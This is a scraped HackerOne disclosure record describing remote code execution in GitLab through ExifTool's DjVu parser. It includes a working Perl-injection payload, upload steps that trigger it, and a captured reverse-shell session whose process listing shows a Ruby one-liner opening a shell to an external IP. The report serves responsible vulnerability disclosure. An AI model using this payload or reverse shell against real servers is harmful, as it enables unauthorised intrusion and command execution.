600\ngit 5398 49.7 1.9 2661404 1274712 ? Sl 12:44 14:43 puma: cluster worker 3: 7369 [gitlab-puma-worker]\ngit 5544 1.3 0.0 45604 27664 ? S 13:14 0:00 /usr/bin/perl -w /opt/gitlab/embedded/bin/exiftool -all= --IPTC:all --XMP-iptcExt:all -tagsFromFile @ -ResolutionUnit -XResolution -YResolution -YCbCrSubSampling -YCbCrPositioning -BitsPerSample -ImageHeight -ImageWidth -ImageSize -Copyright -CopyrightNotice -Orientation -\ngit 5545 0.0 0.0 0 0 ? Z 13:14 0:00 [sh] <defunct>\ngit 5551 0.0 0.0 105260 10840 ? S 13:14 0:00 ruby -rsocket -e exit if fork;c=TCPSocket.new(\"103.3.61.137\",12345);while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end\ngit 5667 0.0 0.0 4504 740 ? S 13:14 0:00 sh -c ps auxww\ngit 5668 0.0 0.0 34424 2864 ? R 13:14 0:00 ps auxww\nroot 5952 0.0 0.0 0 0 ? I 00:24 0:00 [kworker/5:2]\nroot 6812 0.0 0.0 54640 7080 ? Ss Mar08 0:00 nginx: master process /opt/gitlab/embedded/sbin/nginx -p /var/opt/gitlab/nginx\ngitlab-+ 6813 0.0 0.0 59476 12544 ? S Mar08 18:42 nginx: worker process\ngitlab-+ 6814 0.0 0.0 59380 13704 ? S Mar08 18:28 nginx: worker process\ngitlab-+ 6815 0.0 0.0 59504 13088 ? S Mar08 18:57 nginx: worker process\ngitlab-+ 6816 0.0 0.0 59456 13048 ? S Mar08 19:35 nginx: worker process\ngitlab-+ 6817 0.0 0.0 59468 13396 ? S Mar08 18:41 nginx: worker process\ngitlab-+ 6818 0.0 0.0 59508 13700 ? S Mar08 20:20 nginx: worker process\ngitlab-+ 6819 0.0 0.0 59492 13220 ? S Mar08 19:33 nginx: worker process\ngitlab-+ 6820 0.0 0.0 59460 13420 ? S Mar08 22:00 nginx: worker process\ngitlab-+ 6821 0.0 0.0 59508 13420 ? S Mar08 24:15 nginx: worker process\ngitlab-+ 6822 0.0 0.0 59500 13348 ? S Mar08 20:53 nginx: worker process\ngitlab-+ 6823 0.0 0.0 59660 13588 ? S Mar08 27:47 nginx: worker process\ngitlab-+ 6824 0.0 0.0 59972 14116 ? S Mar08 37:52 nginx: worker process\ngitlab-+ 6825 4.0 0.0 63940 18592 ? S Mar08 1788:21 nginx: worker process\ngitlab-+ 6826 1.9 0.0 61436 15808 ? S Mar08 854:41 nginx: worker process\ngitlab-+ 6827 0.1 0.0 60120 14564 ? S Mar08 79:52 nginx: worker process\ngitlab-+ 6828 0.8 0.0 62348 16532 ? S Mar08 351:59 nginx: worker process\ngitlab-+ 6829 0.0 0.0 54836 3732 ? S Mar08 0:08 nginx: cache manager process\ngit 6952 17.6 0.1 1532460 109784 ? Ssl 10:04 33:35 /opt/gitlab/embedded/bin/gitlab-workhorse -listenNetwork unix -listenUmask 0 -listenAddr /var/opt/gitlab/gitlab-workhorse/sockets/socket -authBackend http://localhost:8080 -authSocket /var/opt/gitlab/gitlab-rails/sockets/gitlab.socket -documentRoot /opt/gitlab/embedded/service/gitlab-rails/public -pprofListenAddr -apiLimit 5 -apiQueueDuration 60s -apiQueueLimit 200 -prometheusListenAddr 0.0.0.0:9229 -secretPath /opt/gitlab/embedded/service/gitlab-rails/.gitlab_workhorse_secret -logFormat json -config config.toml\ngit 7369 10.3 1.5 1859556 1033020 ? Ssl 10:04 19:41 puma 5.1.1 (unix:///var/opt/gitlab/gitlab-rails/sockets/gitlab.socket,tcp://0.0.0.0:8080) [gitlab-puma-worker]\nroot 7522 0.0 0.0 0 0 ? I 10:04 0:00 [kworker/11:2]\nroot 8263 0.0 0.0 0 0 ? I 12:15 0:00 [kworker/14:0]\nroot 8266 0.0 0.0 0 0 ? I 08:19 0:00 [kworker/0:2]\nroot 8581 0.1 0.0 0 0 ? I 12:48 0:02 [kworker/u32:1]\nroot 9122 0.0 0.0 0 0 ? I 10:37 0:00 [kworker/8:0]\ngit 9978 47.0 2.0 3182348 1362056 ? Sl 11:43 42:45 puma: cluster worker 8: 7369 [gitlab-puma-worker]\nconsul 10871 0.5 0.2 257480 143704 ? Ssl 2020 2836:38 /opt/consul/1.7.2/consul agent -config-file=/etc/consul/consul.json -config-dir=/etc/consul/conf.d\ngit 10980 51.1 1.8 2507012 1229264 ? Sl 12:49 12:43 puma: cluster worker 2: 7369 [gitlab-puma-worker]\ninfluxd+ 12182 0.0 0.0 188928 1044 ? Ssl 2020 0:14 /usr/bin/influxdb-relay -config /etc/influxdb-relay/influxdb-relay.conf\nroot 12322 0.0 0.0 0 0 ? I 12:49 0:00 [kworker/11:1]\nroot 12828 0.0 0.0 4384 1276 ? S 2020 0:01 svlogd -tt /var/log/gitlab/puma\nroot 12831 0.2 0.0 4384 1228 ? S 2020 1318:06 svlogd /var/log/gitlab/gitlab-workhorse\nroot 12853 0.0 0.0 4384 1260 ? S 2020 0:02 svlogd -tt /var/log/gitlab/nginx\nroot 12856 0.0 0.0 4384 340 ? S 2020 0:00 svlogd -tt /var/log/gitlab/logrotate\ngit 13196 48.0 2.1 2935068 1437312 ? Sl 12:17 27:28 puma: cluster worker 10: 7369 [gitlab-puma-worker]\nroot 13379 0.0 0.0 0 0 ? I 09:53 0:00 [kworker/7:1]\nroot 13382 0.0 0.0 0 0 ? I 09:53 0:00 [kworker/10:1]\nroot 13611 1.0 0.0 1740892 38864 ? Ssl Jan29 1042:19 /usr/bin/process-exporter --config.path /etc/process-exporter/chef-configured.yaml --web.listen-address=:9256 -threads=false -gather-smaps=false\nroot 14478 0.0 0.0 0 0 ? I 09:24 0:00 [kworker/2:0]\ngit 17155 50.3 1.8 2541576 1218444 ? Sl 12:50 11:50 puma: cluster worker 15: 7369 [gitlab-puma-worker]\nroot 17904 0.0 0.0 0 0 ? I 09:59 0:00 [kworker/2:2]\ngit 21109 48.3 1.9 2572804 1258580 ? Sl 12:55 9:17 puma: cluster worker 5: 7369 [gitlab-puma-worker]\nroot 21296 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/8:1]\nroot 21299 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/1:0]\nroot 21301 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/7:0]\nroot 21306 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/15:1]\nroot 21376 0.0 0.0 0 0 ? I 09:59 0:00 [kworker/9:0]\ngit 21698 48.0 2.2 3093788 1459416 ? Sl 12:26 23:00 puma: cluster worker 9: 7369 [gitlab-puma-worker]\nroot 22003 0.2 0.0 0 0 ? I 12:26 0:05 [kworker/u32:3]\nroot 22131 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/9:2]\nroot 22135 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/4:2]\nroot 22142 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/12:3]\nroot 22143 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/3:1]\nroot 22144 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/13:0]\nroot 22863 0.0 0.0 161112 54712 ? Ssl Jan18 0:15 /opt/chef/embedded/bin/ruby --disable-gems /usr/bin/chef-client -c /etc/chef/client.rb -i 1800 -s 300\nroot 24237 0.0 0.0 288904 59208 ? Sl Mar10 6:50 /opt/td-agent/bin/ruby /opt/td-agent/bin/fluentd --log /var/log/td-agent/td-agent.log --daemon /var/run/td-agent/td-agent.pid\nroot 24242 20.6 0.5 3044156 391860 ? Sl Mar10 8337:18 /opt/td-agent/bin/ruby -Eascii-8bit:ascii-8bit /opt/td-agent/bin/fluentd --log /var/log/td-agent/td-agent.log --daemon /var/run/td-agent/td-agent.pid --under-supervisor\ngit 24253 51.3 2.0 2857244 1349560 ? Sl 12:29 23:03 puma: cluster worker 13: 7369 [gitlab-puma-worker]\nroot 24667 0.1 0.0 0 0 ? I 11:29 0:11 [kworker/u32:4]\nroot 24911 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/6:2]\nroot 25156 0.2 0.0 0 0 ? I 12:59 0:01 [kworker/u32:5]\nroot 25516 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/1:1]\ngit 25517 50.4 2.1 2870560 1443204 ? Sl 12:30 21:58 puma: cluster worker 6: 7369 [gitlab-puma-worker]\ngit 25521 49.9 1.8 2550792 1218900 ? Sl 13:00 7:06 puma: cluster worker 4: 7369 [gitlab-puma-worker]\nroot 25525 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/3:2]\nroot 25527 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/15:2]\nroot 26983 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/10:2]\nroot 27893 0.0 0.0 0 0 ? I< 2020 0:00 [xfsalloc]\nroot 27894 0.0 0.0 0 0 ? I< 2020 0:00 [xfs_mru_cache]\ngit 28051 49.9 1.8 2635012 1248076 ? Sl 13:03 5:34 puma: cluster worker 11: 7369 [gitlab-puma-worker]\ngit 28140 50.3 2.1 2943756 1397844 ? Sl 12:33 20:26 puma: cluster worker 14: 7369 [gitlab-puma-worker]\ngit 29132 49.0 2.0 3164444 1367952 ? Sl 12:05 33:39 puma: cluster worker 1: 7369 [gitlab-puma-worker]\nroot 30224 0.0 0.0 0 0 ? I 06:02 0:00 [kworker/14:1]\nroot 30233 0.0 0.0 0 0 ? I 06:02 0:00 [kworker/0:1]\nroot 31940 0.0 0.0 278944 10648 ? Ssl 2020 6:14 /usr/lib/accountsservice/accounts-daemon\nroot 32135 0.1 0.0 0 0 ? I 13:07 0:00 [kworker/u32:0]\nroot 32388 0.0 0.0 0 0 ? I 01:32 0:00 [kworker/4:0]\nroot 32453 5.3 0.0 1774984 40780 ? Sl 2020 13156:17 /opt/prometheus/mtail/mtail -progs /opt/prometheus/mtail/progs -logs /var/log/apt/term.log,/var/log/syslog,/var/log/td-agent/td-agent.log,/var/log/gitlab/gitlab-rails/*.log,/var/log/gitlab/unicorn/unicorn_stderr.log,/var/log/gitlab/unicorn/unicorn_stdout.log -logtostderr\ngit 32635 49.4 2.1 3154204 1401116 ? Sl 12:09 31:54 puma: cluster worker 12: 7369 [gitlab-puma-worker]\ngit 32703 48.7 1.8 2402308 1195496 ? Sl 13:08 3:01 puma: cluster worker 7: 7369 [gitlab-puma-worker]\nexit\n```\n\n\n### Impact\n* Anyone with the ability to upload an image that goes through the GitLab Workhorse could achieve RCE via a specially crafted file\n\n### Examples\n{F1257008}\n{F1257009}\n\n### What is the current *bug* behavior?\nGitLab Workhorse will pass any file to ExifTool, greatly increasing the attack surface. The current bug is in the DjVu module of `ExifTool` which should ideally not ever be hit.\n\n### What is the expected *correct* behavior?\n* There must be better ways of convert C escape sequences than using `eval`\n* Only the TIFF and JPEG modules should be used\n* GitLab Workhorse could check if the file is a valid TIFF of JPEG before passing it to ExifTool\n\n### Output of checks\nThis bug happens on GitLab.com\n\n#### Results of GitLab environment info\n```\nSystem information\nSystem:\nProxy:\t\tno\nCurrent User:\tgit\nUsing RVM:\tno\nRuby Version:\t2.7.2p137\nGem Version:\t3.1.4\nBundler Version:2.1.4\nRake Version:\t13.0.3\nRedis Version:\t6.0.10\nGit Version:\t2.29.0\nSidekiq Version:5.2.9\nGo Version:\tunknown\n\nGitLab information\nVersion:\t13.10.2-ee\nRevision:\tcc4224220e6\nDirectory:\t/opt/gitlab/embedded/service/gitlab-rails\nDB Adapter:\tPostgreSQL\nDB Version:\t12.6\nURL:\t\thttp://192.168.0.127:9080\nHTTP Clone URL:\thttp://192.168.0.127:9080/some-group/some-project.git\nSSH Clone URL:\tgit@192.168.0.127:some-group/some-project.git\nElasticsearch:\tno\nGeo:\t\tno\nUsing LDAP:\tno\nUsing Omniauth:\tyes\nOmniauth Providers:\n\nGitLab Shell\nVersion:\t13.17.0\nRepository storage paths:\n- default: \t/var/opt/gitlab/git-data/repositories\nGitLab Shell path:\t\t/opt/gitlab/embedded/service/gitlab-shell\nGit:\t\t/opt/gitlab/embedded/bin/git\n```\n\n## Impact\n\n* Anyone with the ability to upload an image that goes through the GitLab Workhorse could achieve RCE via a specially crafted file", "published": "2021-04-07T13:59:49", "modified": "2021-05-14T20:08:32", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://hackerone.com/reports/1154542", "reporter": "vakzz", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-05-15T05:29:47", "history": [], "viewCount": 1, "enchantments": {"dependencies": {"references": [], "modified": "2021-05-15T05:29:47", "rev": 2}, "score": {"value": -0.1, "vector": "NONE", "modified": "2021-05-15T05:29:47", "rev": 2}}, "objectVersion": "1.5", "bounty": 20000.0, "bountyState": "resolved", "h1team": {"url": "https://hackerone.com/gitlab", "handle": "gitlab", "profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/variants/000/000/264/8dd359f496ba6c5b97c5126dc86924a00fd7ef26_original.png/00311c7541dfa131115f58f065f11f090f520e0a33b1f347ea385ca21df6c866", "medium": "https://profile-photos.hackerone-user-content.com/variants/000/000/264/8dd359f496ba6c5b97c5126dc86924a00fd7ef26_original.png/a15c8fdab95ed5efd5f3d61e531298869f767d9203f8ea9df2bac929a5d32138"}}, "h1reporter": {"disabled": false, "username": "vakzz", "url": "/vakzz", "profile_picture_urls": {"small": "https://hackerone-us-west-2-production-attachments.s3.us-west-2.amazonaws.com/variants/6zbovkumst7oljmo9v21pig3yh9j/00311c7541dfa131115f58f065f11f090f520e0a33b1f347ea385ca21df6c866?response-content-disposition=inline%3B%20filename%3D%2294971b5a75a669ea52903c09fc847f3434930258211181557be06162f5a8bac0.jpg%22%3B%20filename%2A%3DUTF-8%27%2794971b5a75a669ea52903c09fc847f3434930258211181557be06162f5a8bac0.jpg&response-content-type=image%2Fjpeg&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIAQGK6FURQX2ME2U7S%2F20210515%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20210515T052946Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEHUaCXVzLXdlc3QtMiJIMEYCIQCj7Q88Q2ZnYwhGfEvf6BY40vBEfR60E8WUdxTlD6tw5gIhAOmxWTE%2Ff5UUl2l7eWzlK7wPCviGyL5g55Z3QyzgAxDKKoMECP7%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQAhoMMDEzNjE5Mjc0ODQ5IgxiBg8R2ftRUopbBbsq1wOBTWLV%2FcuPHgxJbEZISm5SysSgncHSCDjkTi6lgla01G9htv2CsFJ24Ppt7txedGcygci1Tkj0hxDFpfwBgZu8%2FmzIw73ueFp4g61vm11Y2WdInnXMevfbv82x%2BDt9QmW7i4lnV%2BKWg1JkYi0ddQ%2FxycWe5Hv1THOQlRFmTCGJkpXPBfrXKi61xsM0OXUuMcjUqP4lJPtTfdcDCaPnTGj50ETh5GXZG7N7PJzWdmqw0aqEn8lam4IC4ivOw3onF%2Bh3ZRnFChvl8aTbqq0yyRNlk%2Br0Z3WjirQ8kypEjUqJufjPMCTNXEoWnTl3VC93GlBRikKE2PrikBDN3RUidRYG6O%2ByMAL00u4uNMmTZeVROlBahg4IbDUX2gGVTEzRLwkwIiVb0p%2FpG9w8uegg3tFDsiEVoX41X1qPptsG8wrbWvLxY9LuRHqPbSsOOryI51V0OQs%2BwbTXAhJs7OJ%2Fvm2Ehl%2BuiIcixQWEZ%2BRlpgP7cOQIsXvCa4%2BhPMacORPe15VsQQ64lppYchhwtVb3cCJYx4Gy%2B7AhcGd%2B2LKc4xhe0BFgehUGLzVYatzHzA8RY7D9gyH0UDoMBIP3SIunQM6jS8QHLHJvUE9bofOOYfchAgaZMp7J%2FQ0w%2FZj9hAY6pAEPBfij%2FAiID1guNNUfONh8qE7lv0A3C%2Fffw%2FoJsD5RDJn9t%2FDXnQ7wu%2Bzlu3Dy4dei8Co%2FY4s2HM1Z2Q%2FpizF%2BsrirJ2DePxM9wT%2BFblA1P08IL6qBMiAPRNcZutJZsL%2BSP1x8E8amXKdT6o78ol4emMt94DpXUiETCUxZNU%2FmuDoi9yNv3vvCc5R4HZhNrONrNY4aMJc5CS9YufUwGR8YKzj4oA%3D%3D&X-Amz-Signature=1667d49ead8e1adbb03577d2af2e4169f084155a5a2e1cb6c45cad94db00ace2"}, "is_me?": false, "cleared": true, "hackerone_triager": false, "hacker_mediation": false}}, "lastseen": "2021-05-15T05:29:47", "differentElements": ["h1reporter"], "edition": 10}, {"bulletin": {"id": "H1:1154542", "hash": "1cd375439ad47ac1fb19046dc2bc0ba5", "type": "hackerone", "bulletinFamily": "bugbounty", "title": "GitLab: RCE when removing metadata with ExifTool", "description": "### Summary\nWhen uploading image files, GitLab Workhorse passes any files with the extensions [jpg|jpeg|tiff](https://gitlab.com/gitlab-org/gitlab/-/blob/v13.10.2-ee/workhorse/internal/upload/exif/exif.go#L104) through to [ExifTool](https://exiftool.org/) to remove any non-whitelisted tags.\n\nAn issue with this is that ExifTool will ignore the file extension and try to determine what the file is based on the content, allowing for any of the supported parsers to be hit instead of just JPEG and TIFF by just renaming the uploaded file.\n\nOne of the supported formats is [DjVu](https://github.com/exiftool/exiftool/blob/11.70/lib/Image/ExifTool/DjVu.pm). When parsing the DjVu annotation, the [tokens are evaled](https://github.com/exiftool/exiftool/blob/11.70/lib/Image/ExifTool/DjVu.pm#L233) to \"convert C escape sequences\". \n\nThere is some validation to try and ensure that everything is properly escaped, but a backslash followed by a newline is correctly handled allowing the quotes to be closed and arbitrary perl inserted and evaluated:\n\n```\n(metadata\n\t(Copyright \"\\\n\" . qx{echo vakzz >/tmp/vakzz} . \\\n\" b \") )\n```\n\n{F1257008} is an example DjVu file with the above metadata, and {F1257009} is an example that runs a reverse shell.\n\n### Steps to reproduce\n1. Download {F1257008} and unzip it\n1. Create a new snippet\n1. In the description field, hit \"Attach a file\"\n1. Select and uplaod `echo_vakzz.jpg`\n1. See that the file `/tmp/vakzz` has been created on the server\n\n\nUploading {F1257009} to https://gitlab.com/-/snippets/new resulted in a shell on `web-09-sv-gprd`:\n\n```\nConnection from [34.74.90.73] port 12345 [tcp/*] accepted (family 2, sport 17073)\nid\nuid=500(git) gid=500(git) groups=500(git)\nhostname -a\nweb-09-sv-gprd\nps auxww\nUSER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND\nroot 1 0.0 0.0 185524 5496 ? Ss 2020 28:31 /sbin/init\nroot 2 0.0 0.0 0 0 ? S 2020 1:44 [kthreadd]\nroot 4 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/0:0H]\nroot 6 0.0 0.0 0 0 ? I< 2020 0:00 [mm_percpu_wq]\nroot 7 0.0 0.0 0 0 ? S 2020 22:50 [ksoftirqd/0]\nroot 8 0.1 0.0 0 0 ? I 2020 552:25 [rcu_sched]\nroot 9 0.0 0.0 0 0 ? I 2020 0:00 [rcu_bh]\nroot 10 0.0 0.0 0 0 ? S 2020 1:05 [migration/0]\nroot 11 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/0]\nroot 12 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/0]\nroot 13 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/1]\nroot 14 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/1]\nroot 15 0.0 0.0 0 0 ? S 2020 1:03 [migration/1]\nroot 16 0.0 0.0 0 0 ? S 2020 20:27 [ksoftirqd/1]\nroot 18 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/1:0H]\nroot 19 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/2]\nroot 20 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/2]\nroot 21 0.0 0.0 0 0 ? S 2020 1:04 [migration/2]\nroot 22 0.0 0.0 0 0 ? S 2020 18:14 [ksoftirqd/2]\nroot 24 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/2:0H]\nroot 25 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/3]\nroot 26 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/3]\nroot 27 0.0 0.0 0 0 ? S 2020 1:05 [migration/3]\nroot 28 0.0 0.0 0 0 ? S 2020 17:57 [ksoftirqd/3]\nroot 30 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/3:0H]\nroot 31 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/4]\nroot 32 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/4]\nroot 33 0.0 0.0 0 0 ? S 2020 1:05 [migration/4]\nroot 34 0.0 0.0 0 0 ? S 2020 17:09 [ksoftirqd/4]\nroot 36 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/4:0H]\nroot 37 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/5]\nroot 38 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/5]\nroot 39 0.0 0.0 0 0 ? S 2020 1:05 [migration/5]\nroot 40 0.0 0.0 0 0 ? S 2020 16:56 [ksoftirqd/5]\nroot 42 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/5:0H]\nroot 43 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/6]\nroot 44 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/6]\nroot 45 0.0 0.0 0 0 ? S 2020 1:05 [migration/6]\nroot 46 0.0 0.0 0 0 ? S 2020 16:33 [ksoftirqd/6]\nroot 48 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/6:0H]\nroot 49 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/7]\nroot 50 0.0 0.0 0 0 ? S 2020 1:06 [watchdog/7]\nroot 51 0.0 0.0 0 0 ? S 2020 1:05 [migration/7]\nroot 52 0.0 0.0 0 0 ? S 2020 16:25 [ksoftirqd/7]\nroot 54 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/7:0H]\nroot 55 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/8]\nroot 56 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/8]\nroot 57 0.0 0.0 0 0 ? S 2020 1:06 [migration/8]\nroot 58 0.0 0.0 0 0 ? S 2020 16:22 [ksoftirqd/8]\nroot 60 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/8:0H]\nroot 61 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/9]\nroot 62 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/9]\nroot 63 0.0 0.0 0 0 ? S 2020 1:05 [migration/9]\nroot 64 0.0 0.0 0 0 ? S 2020 15:52 [ksoftirqd/9]\nroot 66 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/9:0H]\nroot 67 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/10]\nroot 68 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/10]\nroot 69 0.0 0.0 0 0 ? S 2020 1:06 [migration/10]\nroot 70 0.0 0.0 0 0 ? S 2020 16:10 [ksoftirqd/10]\nroot 72 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/10:0H]\nroot 73 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/11]\nroot 74 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/11]\nroot 75 0.0 0.0 0 0 ? S 2020 1:06 [migration/11]\nroot 76 0.0 0.0 0 0 ? S 2020 16:08 [ksoftirqd/11]\nroot 78 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/11:0H]\nroot 79 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/12]\nroot 80 0.0 0.0 0 0 ? S 2020 1:09 [watchdog/12]\nroot 81 0.0 0.0 0 0 ? S 2020 1:03 [migration/12]\nroot 82 0.0 0.0 0 0 ? S 2020 17:07 [ksoftirqd/12]\nroot 84 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/12:0H]\nroot 85 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/13]\nroot 86 0.0 0.0 0 0 ? S 2020 1:06 [watchdog/13]\nroot 87 0.0 0.0 0 0 ? S 2020 1:06 [migration/13]\nroot 88 0.0 0.0 0 0 ? S 2020 16:45 [ksoftirqd/13]\nroot 90 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/13:0H]\nroot 91 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/14]\nroot 92 0.0 0.0 0 0 ? S 2020 1:04 [watchdog/14]\nroot 93 0.0 0.0 0 0 ? S 2020 1:05 [migration/14]\nroot 94 0.0 0.0 0 0 ? S 2020 16:27 [ksoftirqd/14]\nroot 96 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/14:0H]\nroot 97 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/15]\nroot 98 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/15]\nroot 99 0.0 0.0 0 0 ? S 2020 1:07 [migration/15]\nroot 100 0.0 0.0 0 0 ? S 2020 16:35 [ksoftirqd/15]\nroot 102 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/15:0H]\nroot 103 0.0 0.0 0 0 ? S 2020 0:00 [kdevtmpfs]\nroot 104 0.0 0.0 0 0 ? I< 2020 0:00 [netns]\nroot 105 0.0 0.0 0 0 ? S 2020 0:00 [rcu_tasks_kthre]\nroot 106 0.0 0.0 0 0 ? S 2020 0:00 [kauditd]\nroot 110 0.0 0.0 0 0 ? S 2020 0:33 [khungtaskd]\nroot 111 0.0 0.0 0 0 ? S 2020 0:11 [oom_reaper]\nroot 112 0.0 0.0 0 0 ? I< 2020 0:00 [writeback]\nroot 113 0.0 0.0 0 0 ? S 2020 0:51 [kcompactd0]\nroot 114 0.0 0.0 0 0 ? SN 2020 0:00 [ksmd]\nroot 115 0.0 0.0 0 0 ? SN 2020 3:10 [khugepaged]\nroot 116 0.0 0.0 0 0 ? I< 2020 0:00 [crypto]\nroot 117 0.0 0.0 0 0 ? I< 2020 0:00 [kintegrityd]\nroot 118 0.0 0.0 0 0 ? I< 2020 0:00 [kblockd]\nroot 119 0.0 0.0 0 0 ? I< 2020 0:00 [ata_sff]\nroot 120 0.0 0.0 0 0 ? I< 2020 0:00 [md]\nroot 121 0.0 0.0 0 0 ? I< 2020 0:00 [edac-poller]\nroot 122 0.0 0.0 0 0 ? I< 2020 0:00 [devfreq_wq]\nroot 123 0.0 0.0 0 0 ? I< 2020 0:00 [watchdogd]\nroot 127 0.0 0.0 0 0 ? S 2020 76:51 [kswapd0]\nroot 128 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/u33:0]\nroot 129 0.0 0.0 0 0 ? S 2020 0:00 [ecryptfs-kthrea]\nroot 172 0.0 0.0 0 0 ? I< 2020 0:00 [kthrotld]\nroot 173 0.0 0.0 0 0 ? I< 2020 0:00 [acpi_thermal_pm]\nroot 174 0.0 0.0 0 0 ? S 2020 0:00 [scsi_eh_0]\nroot 175 0.0 0.0 0 0 ? I< 2020 0:00 [scsi_tmf_0]\nroot 183 0.0 0.0 0 0 ? I< 2020 0:00 [ipv6_addrconf]\nroot 195 0.0 0.0 0 0 ? I< 2020 0:00 [kstrp]\nroot 212 0.0 0.0 0 0 ? I< 2020 0:00 [charger_manager]\nroot 406 0.0 0.0 0 0 ? I< 2020 0:00 [raid5wq]\nroot 454 0.0 0.0 0 0 ? S 2020 10:42 [jbd2/sda1-8]\nroot 455 0.0 0.0 0 0 ? I< 2020 0:00 [ext4-rsv-conver]\nroot 515 0.0 0.0 0 0 ? I< 2020 11:09 [kworker/12:1H]\nroot 522 0.0 0.0 0 0 ? I< 2020 0:00 [iscsi_eh]\nroot 525 0.0 0.0 0 0 ? I< 2020 0:00 [ib-comp-wq]\nroot 526 0.0 0.0 0 0 ? I< 2020 0:00 [ib-comp-unb-wq]\nroot 527 0.0 0.0 0 0 ? I< 2020 0:00 [ib_mcast]\nroot 528 0.0 0.0 0 0 ? I< 2020 0:00 [ib_nl_sa_wq]\nroot 531 0.0 0.0 0 0 ? I< 2020 0:00 [rdma_cm]\nroot 542 0.0 0.0 0 0 ? I< 2020 10:56 [kworker/6:1H]\nroot 549 0.0 0.0 0 0 ? I< 2020 0:00 [rpciod]\nroot 550 0.0 0.0 0 0 ? I< 2020 0:00 [xprtiod]\nroot 565 0.0 0.0 102968 824 ? Ss 2020 0:00 /sbin/lvmetad -f\nroot 595 0.0 0.0 42604 3368 ? Ss 2020 2:12 /lib/systemd/systemd-udevd\nroot 596 0.0 0.0 12204 4680 ? Ss 2020 451:18 /usr/sbin/haveged --Foreground --verbose=1 -w 1024\nroot 597 0.0 0.0 97900 38924 ? Ss 2020 113:30 /lib/systemd/systemd-journald\nroot 763 0.0 0.0 0 0 ? S 2020 0:00 [hwrng]\nroot 798 0.0 0.0 0 0 ? I< 2020 1:33 [kworker/13:1H]\nroot 814 0.0 0.0 0 0 ? S 2020 12:32 [jbd2/sdb-8]\nroot 815 0.0 0.0 0 0 ? I< 2020 0:00 [ext4-rsv-conver]\nprometh+ 969 0.6 0.0 720896 31292 ? Sl 2020 1997:39 /opt/prometheus/node_exporter/node_exporter --web.listen-address=:9100 --collector.mountstats --collector.nfs --collector.ntp --collector.textfile.directory=/opt/prometheus/node_exporter/metrics --collector.filesystem.ignored-fs-types=^(autofs|binfmt_misc|bpf|cgroup2?|configfs|debugfs|devpts|devtmpfs|fusectl|hugetlbfs|iso9660|mqueue|nfs.*|nsfs|overlay|proc|procfs|pstore|rpc_pipefs|securityfs|selinuxfs|squashfs|sysfs|tracefs)$ 